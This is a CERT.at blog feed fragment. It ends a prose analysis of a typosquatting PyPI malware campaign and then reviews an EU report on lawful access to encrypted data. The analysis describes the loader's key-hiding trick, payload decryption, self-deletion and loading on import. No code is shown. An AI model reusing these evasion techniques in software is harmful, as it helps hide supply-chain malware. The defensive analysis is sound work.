&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The really interesting part is in the &lt;code&gt;mar&lt;/code&gt; function. Every encryption needs some kind of key to perform operations. In this case, to avoid embedding the key in the file, a smart method was used: the key is a filename of one of modules. Which module? Which file? We don&amp;rsquo;t know &amp;ndash; the code keeps only a hash of the key. However, it iterates over all available modules and checks which one has a file name matching the hash (see lines 140-147). While the method is clever, it&amp;rsquo;s not hard to retrieve the key by checking just modules from the standard library. The key has been clearly chosen to work on every Python installation.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/15-mar1-fixed.png&quot; alt=&quot;First part of the &amp;ldquo;mar&amp;rdquo; function. The encryption key is &amp;ldquo;server.py&amp;rdquo;&quot; width=&quot;900&quot; height=&quot;165&quot; /&gt;&lt;br /&gt;&lt;em&gt;First part of the &lt;code&gt;mar&lt;/code&gt; function. The encryption key is &lt;code&gt;server.py&lt;/code&gt;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Once the key has been found, the code uses it to decrypt one of previously declared variables (line 150). The decrypted value is &lt;code&gt;staggerd&lt;/code&gt;, what matches the file name of the PYC file from &lt;code&gt;aiohappyeyeball&lt;/code&gt;. Lines 151-154 adds the file extension, &lt;code&gt;.pyd&lt;/code&gt; on Windows and &lt;code&gt;.so&lt;/code&gt; otherwise. These extensions are used for compiled native Python extension modules. The constructed name will later be used to store the final decrypted extension module.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Line 155 decrypts another previously defined variable, which is a one-element list. We get here the value &amp;ldquo;&lt;code&gt;staggerd.pyc&lt;/code&gt;&amp;rdquo; &amp;ndash; this is exactly the file stored in &lt;code&gt;aiohappyeyeball&lt;/code&gt;. In lines 156-158 we see a tracks covering mechanism: if the decrypted extension module file exists, it will be removed, and the code will also attempt to delete the ZIP archive it&amp;rsquo;s loaded from. We can see the use of the strange &lt;code&gt;__directory__&lt;/code&gt; variable from the &lt;code&gt;aiohappyeyeball&lt;/code&gt;: it&amp;rsquo;s a helper for the location of the malicious module on Windows.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/13-mar1.png&quot; alt=&quot;&quot; width=&quot;800&quot; height=&quot;180&quot; /&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;If the native module does not exist yet, the final part of the code is executed. First, it reads the content of the &lt;code&gt;staggerd.pyc&lt;/code&gt; and removes the file itself. Interestingly, the code is ready to reconstruct the encrypted payload from parts in multiple files, but only one file was used here.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;After that, the decrypted data are saved in one of two location, depending on the system (line 171 or 176). As already said, the data is a compiled Python extension module. Finally, the standard library is used to load the module &amp;ndash; with a slightly different methods used on Windows and Linux.&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/14-mar3.png&quot; alt=&quot;&quot; width=&quot;800&quot; height=&quot;278&quot; /&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Finally, the &lt;code&gt;mar&lt;/code&gt; function is called immediately upon importing the malicious code. The last thing worth mentioning is that the &lt;code&gt;aiohappyeyeball&lt;/code&gt; was uploaded in a few versions compiled for different operating systems, leveraging&amp;nbsp;standard Python package managers to deliver the right version of the payload.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;And all this for... nothing?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;At least that's what it looks like. I decrypted the payload, and executed it in a sandbox [5] [6]. And... nothing happened. Both Linux and Windows versions are loaded correctly, but they do not export any function. As my binary reverse engineering skills ends on &amp;ldquo;strings&amp;rdquo; command, I didn&amp;rsquo;t find anything more clearly suspicious inside. If you speak binary and want to play with it, both Windows and Linux versions are now on VirusTotal [7] [8].&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;The End&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;So far, the campaign used 5 packages [9], all of them utilizing some kind of typosquatting name. They all have already been removed or quarantined, and thus, are no longer installable. This is one of more interesting campaigns of the last time, so as the recap:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;the encrypted payload was hidden in the &lt;code&gt;aiohappyeyeball&lt;/code&gt;, installed as a dependency&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;the loader code was hidden in a ZIP archive disguised as something else and secretly loaded&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;the encryption was implemented using only the standard library&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;the key is not kept in the plain text, but delivered from a file name of some standard module&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;the final stage is a compiled extension module&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;it clones popular packages and uses typosquatting with similar names.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This is also an excellent example that shows that even if you have trained your eyes on dozens of typosquatted names and seen all modifications of &lt;code&gt;requests&lt;/code&gt;, you can still be tricked by simple but smartly placed, typosquatting. Unfortunately, I have to leave the final question &amp;ndash; what was it for? &amp;ndash; open. I suspect the whole thing might have been just a test, especially because the decryption mechanism supports a split payload, but didn't utilize the capability. But who knows &amp;ndash; maybe they have tricked me again?&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Packages in the campaign&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;aiohappyeyeball&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;aiohttp-openssl&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;aiohttp-ssl&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;asynhttp&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;httpserver-cache&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;References&lt;/h3&gt;&#13;
&lt;ol&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/Typosquatting&quot;&gt;https://en.wikipedia.org/wiki/Typosquatting&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/Happy_Eyeballs&quot;&gt;https://en.wikipedia.org/wiki/Happy_Eyeballs&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://pypi.org/project/aiohttp/&quot;&gt;https://pypi.org/project/aiohttp/&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://pypi.org/project/aiohappyeyeballs/&quot;&gt;https://pypi.org/project/aiohappyeyeballs/&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://tria.ge/251027-18sgmaat8e&quot;&gt;https://tria.ge/251027-18sgmaat8e&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://tria.ge/251028-w1z5aaaq9x/static1&quot;&gt;https://tria.ge/251028-w1z5aaaq9x/static1&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/69d8c6ca2f4d9343f421ecdbe38a63eb6dc1197657e5bd46bd322da202870329/detection&quot;&gt;https://www.virustotal.com/gui/file/69d8c6ca2f4d9343f421ecdbe38a63eb6dc1197657e5bd46bd322da202870329/detection&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/1d04fc08da9f8cf3e9f93319b40af9ba2d2a61a7234d60de2b2fe2f22f835439/detection&quot;&gt;https://www.virustotal.com/gui/file/1d04fc08da9f8cf3e9f93319b40af9ba2d2a61a7234d60de2b2fe2f22f835439/detection&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://bad-packages.kam193.eu/pypi/campaign/2025-10-asynhttp/&quot;&gt;https://bad-packages.kam193.eu/pypi/campaign/2025-10-asynhttp/&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://docs.python.org/3/extending/extending.html&quot;&gt;https://docs.python.org/3/extending/extending.html&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ol&gt;</description><pubDate>Wed, 29 Oct 2025 15:52:12 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/10/how-typosquatting-tricked-me-a-bit</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-10-29T15:52:12Z</dc:date></item><item><title>A review of the “Concluding report of the High-Level Group on access to data for effective law enforcement”</title><link>https://www.cert.at/en/blog/2025/10/hlg-paper-review</link><description>&lt;p class=&quot;block&quot;&gt;As I&amp;rsquo;ve written &lt;a href=&quot;https://www.cert.at/en/blog/2025/7/encryption-vs-lawful-interception-eu-policy-news&quot;&gt;here&lt;/a&gt;, the EU unveiled a roadmap for addressing the encryption woes of law enforcement agencies in June 2025. As a preparation for this push, a &amp;ldquo;&lt;a href=&quot;https://home-affairs.ec.europa.eu/networks/high-level-group-hlg-access-data-effective-law-enforcement_en&quot;&gt;High-Level Group on access to data for effective law enforcement&lt;/a&gt;&amp;rdquo; has summarized the problems for law enforcement and developed a list of recommendations.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;(Side note: The EU Chat Control proposal is making headlines these days, the HLG report is dealing with a larger topic. I will not comment on the CSAM issues here at all.)&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I&amp;rsquo;ve read this this report and its conclusions, and it is certainly a well-argued document, but strictly from a law enforcement perspective. Some points are pretty un-controversial (shared training and tooling), others are pretty spicy. In a lot of cases, it hedges by using language similar to the one &lt;a href=&quot;https://ec.europa.eu/commission/presscorner/detail/en/ip_25_1599&quot;&gt;used by the Commission&lt;/a&gt;:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;In 2026, the Commission will present a &lt;strong&gt;Technology Roadmap on encryption&lt;/strong&gt; to identify and evaluate solutions that enable lawful access to encrypted data by law enforcement, while &lt;strong&gt;safeguarding cybersecurity and fundamental rights&lt;/strong&gt;. &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;They are not presenting concrete solutions; they are hoping that there is a magic bullet which will fulfill all the requirements. Let&amp;rsquo;s see what this expert group will come up with.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;But first, let&amp;rsquo;s have a look at the report from the HLG. This is not a full review but highlights the points I find interesting, with a likely bias in the direction of where I disagree.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Chapter I: Digital forensics&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 8:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Criminals constantly adapt their behaviours to elude detection. Available statistics indicate that criminals are increasingly moving to legitimate end-to-end encrypted platforms. However, once effective countermeasures are found, it is likely that they will move again to different communication channels&lt;/em&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is a two-edged sword: if criminals use their own dedicated infrastructure, they are making these a perfect target for LE actions (or subterfuge), &lt;a href=&quot;https://www.dw.com/en/global-police-sting-topples-ghost-criminal-messaging-app/a-70250952&quot;&gt;Ghost&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;https://en.wikipedia.org/wiki/EncroChat&quot;&gt;EncroChat&lt;/a&gt; and &lt;a href=&quot;https://de.wikipedia.org/wiki/Operation_Trojan_Shield&quot;&gt;AN0M&lt;/a&gt; are examples for this. If the criminals hide between millions of law-abiding users in popular apps, then any LE action will potentially impact them as well. Any meaningful cooperation by the operators will just drive the criminals again into niche or self-hosted solutions &amp;ndash; opening another window for targeted operations. So perhaps having LE access in big platforms will just mean that the big fishes will move to other ponds, leaving only the small fry in the reach of LE nets.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;But the main takeaway is the following: Whatever Law Writers and Law Enforcement do; the other side can react. We thus need to plan and strategize not just for the here and now but also think about countermoves and unintended consequences.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 9:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Access to digital evidence is considered to play a key role in 85 % of investigations.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Has the resource allocation within LE moved in parallel with the shift of crime to the online space?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;While lawful access to data for law enforcement purposes is at the core of providing our citizens with the highest possible level of security, this must not be at the expense of fundamental rights or the cybersecurity of systems and products.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I&amp;rsquo;m really glad that this report acknowledges these two counterbalancing requirements. While I have a strong personal opinion on the fundamental rights aspect, the effect on the cybersecurity of systems and products is of professional interest to me. This blogpost will thus focus on the cybersecurity impact, not the human rights one.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 10:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Strong accountability is crucial. In our democratic societies, it is the responsibility of lawmakers to establish the conditions for such accountability, ensuring a high level of privacy and security.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;That is the theory. In practice we all know that accountability for LE overreach in practice is, let&amp;rsquo;s say it that way, spotty. The &lt;a href=&quot;https://www.europarl.europa.eu/doceo/document/A-9-2023-0189_EN.html&quot;&gt;report from the European Parliament&lt;/a&gt;&amp;nbsp;documents the abuse of LE powers, but news of real accountability for those transgressions have been scarce.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Call me jaded, but the only way that LE can convince the population that &amp;ldquo;yes, this time, for these new power, we well strictly follow the law and have accountability if abuses happen&amp;rdquo; are not empty promises is to effectively police themselves regarding past abuses.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 10:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Cybersecurity of products and services and lawful access to data both stem from legal obligations and must be able to coexist.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is the challenge in a nutshell. None of the proposals I have seen managed to thread that needle. I specifically asked exactly this question at the EC3 during my latest visit, and the answers all came down to&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We need it, there must be a way&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Just be more creative and think outside the box&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;I once talked to someone who claimed to have a solution&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The Recommendation Cluster 1 is fine.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 20, Recommendation Cluster 2:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;2. setting up a process dedicated to the exchange of capacities that potentially involve the use of vulnerabilities, which would allow knowledge and resources to be pooled while ensuring that the confidentiality and sensitivity of the information would be respected. &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;3. possibly exploring a European approach to the management and disclosure of vulnerabilities handled by law enforcement, based on existing good practices.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Existing good practices are called &amp;ldquo;CVD &amp;ndash; coordinated vulnerability disclosure&amp;rdquo;, and the aim is to get vulnerabilities fixed as comprehensively and quickly as possible. This is what NIS2 requires CERTs to do. This is what the CRA demands that suppliers do.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The idea that we keep vulnerabilities open for our own use is completely anathema to the thinking and the mission of the cybersecurity community.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 21:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Though it is still sometimes key to investigations, the exploitation of vulnerabilities must be handled with extreme care, in compliance with the relevant domestic legal framework, as it impinges on the security posture of hardware and software.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;No shit, Sherlock!&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We really need to differentiate here. Exploiting an operations error or programming mistake on the side of the criminals is fine. If they don&amp;rsquo;t secure their Ransomware management infrastructure, then by all means, let LE break in and do their investigations. But if the vulnerability is in a generic software product that is being used by millions of citizens, then things change dramatically. I do not think that even &amp;ldquo;extreme care&amp;rdquo; can overcome the downsides here.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;The HLG experts invite the European Commission&amp;rsquo;s JRC to explore the feasibility of setting out a European approach for the management and disclosure of vulnerabilities, handled by law enforcement, based on existing good practices&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This clashes with the CRA and NIS2 regulations, as well as national CVD policies.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The Recommendation Cluster 3 is fine.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 23, Recommendation Cluster 4:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;1. developing a platform (SIRIUS or equivalent) for sharing tools, best practices and knowledge on how to be granted access to data by product owners, producers and hardware manufacturers. &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;4. establishing a research group to assess the technical feasibility of built-in lawful access obligations (including for accessing encrypted data) for digital devices, while maintaining and without compromising the security of devices and the privacy of information for all users, as well as without weakening or undermining communications security.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;ldquo;Owners&amp;rdquo; is fine &amp;ndash; if they want to give access to LE to their own devices, so be it. But secure and targeted LE access in products is a chimera.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;For me, the important distinction between a product and a service is the following:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A product is built by the manufacturer and then delivered in (mostly) the same state to multiple customers. In many cases, old-school shrink-wrapped software, the supplier doesn&amp;rsquo;t even know who the customer is. And once the product has been shipped, the influence of the vendor on the operation of the product is very limited. This can be best explained by Open-Source products: If I install Debian Linux on my Laptop, use LUKS to do full-disk encryption and give LE a reason to do full forensics on that machine without my cooperation: what can LE do? They could go and ask Debian and the answer will be: &amp;ldquo;Otmar probably (we don&amp;rsquo;t know for sure; we don&amp;rsquo;t keep track who uses our product) runs LUKS with the default encryption settings, we don&amp;rsquo;t know any way to bypass that encryption. If we knew a way, then millions of other users would be in danger, thus we would have fixed the defect as soon as we learned of it.&amp;rdquo; There is no way to implement real security in a product (without some sort of key-escrow service) while still give LE access.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A service is different thing: here the vendor is directly involved in handling the data of its customers, there is at least a change to special-case this single customer once a court-order arrives at the door.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Service vs. product is not strictly binary, though. Products need updates, giving vendors a chance to influence what&amp;rsquo;s running at a specific customer. WhatsApp and other such OTT services combing a Product (the App) with a Service (the cloud-component).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;For example, in the case of video surveillance recordings, LEAs are increasingly faced with encrypted files that cannot be analysed by automatic software, especially when large quantities of video are involved.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;That's an easy one, and not only for LEAs, as citizens run into the same issue with e.g. TV time-shifting disks attached to TVs. It should be possible for the owners of a device to have unencumbered access to content they own, or where there is a legal right to access it.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;In parallel, more transparent solutions enabling access to data in clear on seized devices should be considered, to increase the effectiveness of investigations and, at the same time, ensure a level playing field among industry players, while preserving cybersecurity and safeguarding privacy.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;No. This will not work. See the argument about the security of products from above.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;A key action under this technology roadmap would be to assess the technical feasibility of built-in lawful access obligations (including for accessing encrypted data and encrypted CCTV recordings) for digital files and devices, while ensuring strong cybersecurity safeguards and without weakening or undermining communications security. This assessment would be carried out involving all relevant stakeholders.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I give you the CCTV case (give the owners the possibility to do bulk export in clear data), but for the rest, I just don&amp;rsquo;t see a solution that still &amp;ldquo;ensures strong cybersecurity safeguards and does not weaken or undermine communications security&amp;rdquo;.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Chapter II: Data retention&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The majority of points raised here are sensible.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 34, Recommendation Cluster 6:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;ensuring that Member States can enforce sanctions against electronic and other communications services providers which do not cooperate with regard to the retention and provision of data, e.g. through the implementation of administrative sanctions or limits on their capacity to operate in the EU market.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Given how miserably the EU fails to enforce EU law with respect to big US companies, I&amp;rsquo;m not optimistic that this will work. See also online gambling and similar &amp;ldquo;services&amp;rdquo; which might be popular, but of unclear legality.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Chapter III: Lawful interception&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 39:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;In contrast, the UK, under the Investigatory Powers Act, has set up a framework for lawful interception of OTT communications which, thanks to the adoption of the UK-US data access agreement, also applies to OTT services based in the US. According to relevant UK authorities, this makes a significant difference in crime prevention and investigations.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Citation needed.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 40:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;In landmark case C-670/22, the CJEU embraced a broad concept of &amp;lsquo;interception of telecommunications&amp;rsquo;, holding that the infiltration of terminal devices for the purpose of gathering traffic, location and communication data from an internet-based communication service constituted an &amp;lsquo;interception of telecommunications&amp;rsquo;.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I wasn&amp;rsquo;t aware of that case, I should probably read the &lt;a href=&quot;https://eucrim.eu/documentation/ecj-eu-criminal-law-cases-overview/case-c-67022/&quot;&gt;judgment&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 41:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;However, the increasing complexity of communication infrastructures and protocols in 5G, such as virtualisation, network slicing, edge computing and privacy-enhanced features, poses new technological challenges for traditional operators. The HLG experts insisted notably on challenges pertaining to Home Routing and to Rich Communication Services (RCS).&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The authors are right that the changes in technology have a clear impact on which options are even there for lawful interception. The &amp;ldquo;&lt;a href=&quot;https://www.europol.europa.eu/cms/sites/default/files/documents/Europol%20-%20Position%20paper%20on%20Home%20routing.pdf&quot;&gt;Europol position paper on Home routing&lt;/a&gt;&amp;rdquo; also sounds interesting.&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 41/42:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Finally, the HLG experts highlighted that one of the main technical challenges posed to LEAs comes from end-to-end encryption, notably for OTT communications, with more than 80 % of communications being run through end-to-end encrypted services (live communications and back-up storage), thus preventing investigators from accessing communication content. At the same time, the experts also agree that end-to-end encryption is considered a robust security measure which effectively protects citizens from various forms of crime. By ensuring that only the communicating users can access the content of their messages, end-to-end encryption effectively protects against unlawful eavesdropping, data theft, state-sponsored espionage and other forms of unauthorised access by hackers, cybercriminals, or even the service providers themselves.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is the crux of the matter in a nutshell.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;There is a legitimate need to protect communication from eavesdropping, and the possible adversaries range from the operators themselves up to state-sponsored espionage. And despite this, when law enforcement comes in waving a magic paper signed by a judge, then all those technical defences need to stand aside and enable &amp;ldquo;lawful interception&amp;rdquo;. Like Moses parting the sea, the Light of Galadriel causing orcs to flee, holy water repelling vampires, or any other magic device from the realm of human fantasy that can save a tricky situation.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;How exactly this magic can be worked, this paper does not reveal.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 42:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Law enforcement representatives would prefer an approach that requires companies to provide law enforcement with access to data in clear under strict conditions. It should be noted, however, that cybersecurity experts raised concerns that such solutions would undermine cybersecurity.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Three points here:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is thinking in &amp;ldquo;services&amp;rdquo;, not in &amp;ldquo;products&amp;rdquo;. Signal, the cloud service, does not deal in messages at all, it provides authentication and a publish-subscribe message bus for generic communication. It&amp;rsquo;s only the &amp;ldquo;product&amp;rdquo;, the Signal App, that turns all this into a messaging platform. The &amp;ldquo;company&amp;rdquo; has as much knowledge of the cleartext communication as Canon knows about the images the cameras take that it sold to customers.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;That&amp;rsquo;s why the &amp;ldquo;undermine cybersecurity&amp;rdquo; point come in: in order to be able to give LE any leg up in accessing the cleartext, the company has to undermine the security properties of end-to-end encrypted communication. If, for example, Signal were able to give LE enough information that LE can decrypt communication data received via a wiretap, then Signal itself would be able to decrypt the messages, as they are relayed via Signal&amp;rsquo;s servers. This clearly contradicts the quote from above: &amp;ldquo;&lt;em&gt;By ensuring that only the communicating users can access the content of their messages, end-to-end encryption effectively protects against unlawful eavesdropping, data theft, state-sponsored espionage and other forms of unauthorised access by hackers, cybercriminals, or even the service providers themselves&lt;/em&gt;.&amp;rdquo;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Once you open a door for LEAs, then other players (including LEAs from non-democratic countries) will also come knocking. And in a number of countries, those players (services, state security, military) operate under a completely different legal regime. For example, from Wikipedia: &amp;ldquo;&lt;a href=&quot;https://en.wikipedia.org/wiki/National_security_letter&quot;&gt;A national security letter (NSL) is an administrative subpoena issued by the United States government to gather information for national security purposes. NSLs do not require prior approval from a judge.&lt;/a&gt;&amp;rdquo; These agencies might be constrained regarding their own citizens, but for foreigners there is usually very little oversight. Holding LEA to a hight legal standard is thus not enough. Any solution that enables LEA access must somehow be able to deny the same access to organisation with a bigger bludgeon to enforce compliance.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 44:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;As a result, the HLG experts consider it a priority to ensure that obligations on lawful interception of available data apply in the same way to traditional and non-traditional communication providers and are equally enforceable. The harmonisation of such obligations should serve to overcome the challenges related to the execution of cross-border requests.&lt;/em&gt;&lt;/p&gt;&#13;
